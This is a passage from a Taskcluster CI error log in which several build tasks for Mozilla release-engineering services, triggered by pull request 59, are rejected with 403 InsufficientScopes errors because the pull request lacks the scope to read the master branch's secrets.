403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"RKp5vWTvS9ur-sktlpQlkw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.293Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.293Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.293Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.453Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"RKp5vWTvS9ur-sktlpQlkw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.293Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.293Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.293Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.453Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"RKp5vWTvS9ur-sktlpQlkw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"2149d5ac7a1dc167892552ade57e1e8bec490f1c\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:45:00.293Z\",\n                    \"deadline\": \"2016-09-24T12:45:00.293Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"cewceEfSSlGZUz5a2sklRw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:45:00.293Z\"\n                },\n                \"time\": \"2016-09-23T12:45:00.453Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"UqjZeC11RreMbjU1Eo656A\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.291Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.291Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.291Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.484Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"UqjZeC11RreMbjU1Eo656A\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.291Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.291Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.291Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.484Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"UqjZeC11RreMbjU1Eo656A\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"2149d5ac7a1dc167892552ade57e1e8bec490f1c\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:45:00.291Z\",\n                    \"deadline\": \"2016-09-24T12:45:00.291Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"cewceEfSSlGZUz5a2sklRw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:45:00.291Z\"\n                },\n                \"time\": \"2016-09-23T12:45:00.484Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IPg09aDOR3GXMdGHwn_uog\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L 